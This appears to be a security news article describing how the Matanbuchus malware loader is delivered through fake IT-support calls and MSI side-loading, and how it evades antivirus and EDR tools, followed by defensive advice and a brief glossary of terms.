Malware in Disguise: How Matanbuchus Morphs to Outsmart Antivirus Defenses

It starts with a simple call from “IT support.” Soon, an employee runs what looks like a harmless update file - and in the blink of an eye, attackers slip past the company’s cyber defenses. Behind this digital sleight of hand is Matanbuchus: a chameleon-like malware that’s rewriting the rules of evasion.

Matanbuchus isn’t your average malware. Sold on the dark web as Malware-as-a-Service, it has become a favorite tool for ransomware groups and data thieves. What makes it especially dangerous? Its ability to rapidly change its internal components - code, strings, payloads - rendering static antivirus signatures nearly useless.

Researchers at Zscaler have tracked a surge in attacks where the malware is delivered through MSI files - installer packages commonly used for legitimate Windows software. These files, often hosted on attacker-controlled domains, are designed to look innocuous. When executed, they “side-load” the malicious Matanbuchus downloader DLL by piggybacking on trusted programs like HRUpdate.exe or Notepad++ updaters.

The malware’s authors lace their code with junk instructions, encrypt critical strings with the robust ChaCha20 cipher, and use hashing tricks to resolve Windows API calls. To further frustrate defenders, Matanbuchus introduces “busy loops” that delay execution - tricking sandbox analysis tools that rely on short inspection windows.

Once inside a system, Matanbuchus gathers reconnaissance data: hostnames, operating system details, and installed security tools. It’s programmed to spot popular endpoint detection and response (EDR) software, including BitDefender, ESET, and Symantec, and adjusts its behavior accordingly. Communication with its command-and-control (C2) servers is hidden in encrypted, base64-encoded traffic, making it difficult to spot with standard network monitoring.

The attack chain often begins with social engineering. Criminals pose as IT support via Microsoft Teams or QuickAssist, convincing victims to run “updates” that are actually booby-trapped MSI or ZIP files. After infection, Matanbuchus can deploy further malware such as stealers or remote access trojans, and pave the way for hands-on ransomware attacks. Each campaign is more sophisticated than the last, with version 3.0 now using advanced techniques like WQL queries and indirect system calls to slip past even modern EDR tools.

Defenders are urged to block known malicious domains, monitor for suspicious use of msiexec.exe, and train staff to spot phishing attempts. Signature-based detection is no longer enough - behavioral monitoring and machine learning anomaly spotting are now essential in the fight against this shape-shifting threat.

As Matanbuchus continues to adapt, it’s a stark reminder that in cybercrime, nothing stays static for long. The battle between attackers and defenders is escalating - and only those who evolve can hope to survive.

WIKICROOK

• Malware: Il malware è un software dannoso progettato per infiltrarsi, danneggiare o rubare dati da dispositivi informatici senza il consenso dell’utente.
• DLL Side: DLL Side is a technique where attackers trick programs into loading malicious DLL files, bypassing security and gaining unauthorized access or control.
• ChaCha20: ChaCha20 is a fast, secure encryption algorithm that scrambles data to protect it from unauthorized access, widely used in modern cybersecurity.
• API Hashing: API Hashing hides Windows system calls by replacing their names with coded hashes, making it harder for security tools to detect malicious activity.
• Process Hollowing: Process hollowing is a technique where malware hides in a legitimate program’s memory, allowing it to evade detection and execute malicious actions.